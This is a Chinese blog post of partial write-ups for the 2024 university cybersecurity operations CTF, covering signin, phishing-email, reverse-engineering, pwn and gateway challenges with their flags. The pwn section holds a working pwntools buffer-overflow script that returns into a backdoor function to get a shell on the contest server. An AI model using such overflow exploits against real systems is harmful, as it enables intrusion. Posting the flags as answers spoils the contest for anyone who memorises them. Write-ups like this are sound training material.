2024高校网络安全管理运维赛题目--复现+题目+wp

最新推荐文章于 2024-11-11 21:47:34 发布
最新推荐文章于 2024-11-11 21:47:34 发布
阅读量907 收藏 7
点赞数 3
文章标签: web安全 数据库 服务器 pwn reverses ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64696290/article/details/139597887
版权

比赛官网

比赛官网

部分writeup

Signin
如图所示GIF提取,然后简单的ROT13
flag{welcome-to-signin-quiz}

邮件
----如图所示简单的base64

邮件flag{WeLCoMeto}

邮箱flag{phishHUntInG}

Babyre
解析:放到IDA分析,看伪代码

得到AncsA6gXMSMoMqIuNCMuxaYuAGIavC9=关键字符转
分析得到是类似base64的加密但又不完全是
写python代码对关键字符串处理,

def reverse_alnum(input_str):
    result = []
    for char in input_str:
        if char.isalpha():
            # 大写字母A-Z替换为Z-A
            if char.isupper():
                result.append(chr(90 - (ord(char) - 65)))
            # 小写字母a-z替换为z-a
            else:
                result.append(chr(122 - (ord(char) - 97)))
        elif char.isdigit():
            # 数字1-9替换为9-1
            if char != '0':
                result.append(str(9 - int(char) + 1))
            else:
                result.append('0')  # 0保持不变
        else:
            # 非字母数字字符保持不变
            result.append(char)
    return ''.join(result)

# 示例
input_str = input("请输入一个包含英文字符和数字的字符串:")
output_str = reverse_alnum(input_str)
print("替换后的字符串为:", output_str)

最后base64解密
答案flag{B4se64_1s_s0_e4sy}

在这里插入图片描述

Pwn
解释:看代码呀
构造输入的内容溢出然后ret到后门函数(简单的ret2text)
答案:flag{kOoD1EijiemeePh8IeNei2XOL8ich5de}

from pwn import *
#context(os='linux',arch='amd64',log_level='debug')
#p=process('./pwn')
elf=ELF('./pwn')
libc = ELF('libc.so.6')
p=remote("prob07.contest.pku.edu.cn",10007)
#gdb.attach(p, 'b *0x40121d')

bin_sh_address_chuancan=0x40117a


ret = 0x40121e

offset=0x78

payload1=b'31:MEQCIHOFrdjB9js6X862TKy0BVBCbHCJyY9DFzfczTllh8GuAiA7m5orfJ0SRZt6xI_ZEE__jRp8V9V8YIP13k61RG9quw=='
p.sendline(payload1)

payload2=b'a'*offset + p64(bin_sh_address_chuancan)
p.sendlineafter(b'Enter your username: ',payload2)
p.sendline(payload2)
#pause()
p.interactive()

在这里插入图片描述Gateway解析:
找到这个文件 ,十进制的ASCII的转换
答案:flag{ad1985868133e8cf1828cb84adbe5a5b}
在这里插入图片描述

题目资源

题目资源

有时间我再自己完全的做一遍,未完待续~

答案当然是要最后看哒:

官方writeup
集思广益
比较好的备份

2024 高校网络安全管理运维 Writeup.pdf
05-16
2024 高校网络安全管理运维 Writeup.pdf
高校网络安全管理运维WP
xuzhentao520的博客
05-14 1474
高校网络安全管理运维WP
2024高校网络安全管理运维wp
toto的博客
05-07 3584
给了login的patch,没一点过滤,考虑普通用户登陆之后新建一个ADMIN,然后直接利用$toLower去覆盖admin的mongo集合。后面没有什么地方有有用信息了,根据题目钓鱼邮件,可能第三段flag就跟DMARC、DKIM 和 SPF有关了。可以先用fqlite看一遍,大概就可以看出flag是根据sort排的,(当然这一步没有问题也不是很大)解析一下主域名,得到提示有三段flag,估计就对应DMARC、DKIM 和 SPF三种方法了。定位到数据部分之后,一眼看到flag数据,接着就是顺序问题了。
2024高校网络安全管理运维 wp
渗透测试研究中心
10-07 1522
0x00 前言本文是关于“2024高校网络安全管理运维”的详细题解,主要针对WebPwn、Re、Misc以及Algorithm等多方向题目的解题过程,包含但不限于钓鱼邮件识别、流量分析、SQLite文件解析、ssrf、xxe等等。如有错误,欢迎指正。0x01 Misc签到给了一个gif,直接在线分帧得到synt{fvtava-dhvm-jryy-qbar},一眼凯撒,直接rot13解码fla...
2024高校网络安全管理运维】巨细记录!
jayq1的博客
05-08 2446
虽然不是全部题目,但对于做出来的题目记录非常详细,题目还是挺有意思的,希望对师傅们有帮助,欢迎师傅们来交流指导!
2024 高校网络安全管理运维 -实践能力项Writeup(misc-2部分解析)
weixin_39435784的博客
05-09 630
2024 高校网络安全管理运维 -实践能力项Writeup(misc-2部分解析)
2022-2024参加网络安全wp(持续更新)
苦行僧的妖孽日常
10-24 5833
2022、2024中国工业互联网安全核能行业道、2023陇剑杯(预选)、2023强核杯、2023工业信息安全技能大网络安全CTF)的WriteUp。
华为1+X网络系统建设与运维-初级-PPT版.zip
07-23
内含PPT版教材和PDF版实验
java运维管理平台-后台管理小系统
06-01
Java运维管理平台是一款基于前后端分离技术构建的后台管理系统,主要由前端的VUE+Element-UI框架和后端的SpringBoot框架共同支撑。这样的设计旨在提供高效、易用的运维监控与管理工作环境,帮助IT专业人员更好地管理...
华为1+x网络建设与运维-考试练习题.docx
06-26
### 华为1+x网络建设与运维知识点解析 #### OSI参考模型层次结构 - **物理层**:负责处理比特流的传输,是最底层的通信协议层,主要关注于信号的编码方式、接口类型等。 - **数据链路层**:位于物理层之上,主要...
1+X-网络系统建设与运维PPT.zip
06-26
第6章 网络安全技术v3.0.pptx 第7章 IPv6协议v3.0.pptx 第8章 WLAN技术v3.0.pptx 第9章 网络管理v3.0.pptx 第10章 企业网项目建设实践v3.0.pptx 第11章 网络自动化运维v3.0.pptx 华为1+x网络系统建设与运维(中级)...
网络安全招新wp
ITITITLu的博客
11-19 268
网安WP
网络与信息安全领域专项 wp
weixin_44255856的博客
08-18 979
web game 打开页面直接审查源码 发现这两个js文件比较可疑,于是查看。 在cqg.js文件中发现了 于是在http://6d03d4f7b3f24269af3d217475afd474d9f69cc849b941ce.changame.ichunqiu.com/score.php页面中直接post:score=15 即可得到flag who are you 打开页面随便输入 先...
网络安全 | 漏洞挖掘】隐藏的 DOS 技术
等风来
11-11 68
我调查了这些参数的用途,发现它们被传递给了第三方服务,且该服务的文档说明这些参数是安全的。你可以试试这样做:前往https://ash-speed.hetzner.com/并找到一个测试文件(大小大约1到10 GB),如果服务器等待URL请求完成,你可以通过大量此类请求来淹没服务器,从而导致它最终崩溃。于是我发送了一个包含1000个UUID的列表,结果网站在60秒后超时,并出现了显著的延迟。在我的案例中,这导致了客户网站的DOS攻击,问题被发现并快速修复,甚至在我报告漏洞之前。
硬件设备网络安全问题与潜在漏洞分析及渗透测试应用
weixin_62512865的博客
11-08 1168
硬件加密绕过漏洞:研究发现,多款流行的SSD存在加密机制绕过漏洞,攻击者可以无需密码 即可绕过硬盘加密措施,获取硬盘中的数据内容。这包括Crucial和Samsung等品牌的SSD产 品,它们尝试实现TCG Opal加密标准,但存在缺陷,允许在不知道任何密钥的情况下完全恢 复数据。固件更新机制漏洞:英睿达MX500系列SSD被曝出存在缓冲区溢出漏洞,攻击者可以精心构 造ATA数据包,通过主机直接发送给SSD控制器,从而触发缓冲区溢出,可能导致数据泄露。
网络安全---安全见闻2
最新发布
久恙502的博客
11-11 504
拓宽视野不仅能够丰富我们的知识体系,也是自我提升和深造学习的重要途径!!!
数据安全、信息安全网络安全区别与联系
2401_88326591的博客
11-07 862
信息安全是保护信息系统免受意外或故意的非授权泄漏、传递、修改或破坏。
网络安全 | 并发问题】Nginx重试机制与幂等性问题分析
等风来
11-09 240
在现代互联网应用中,高可用性(HA)是确保系统稳定性的关键要求之一。为了应对服务器出现故障或超时等问题,负载均衡被广泛应用于分布式系统中。Nginx作为一种高性能的反向代理服务器,常常被用于实现负载均衡和容错功能。当被代理的服务出现错误时,Nginx可以自动将请求转发到其他健康的服务器,从而提高系统的可用性和容错能力。然而,在实际应用中,Nginx的错误重试机制可能会导致一些业务上的意外问题,尤其是在处理非幂等性HTTP请求(如POST、DELETE)时。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

是乙太呀

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值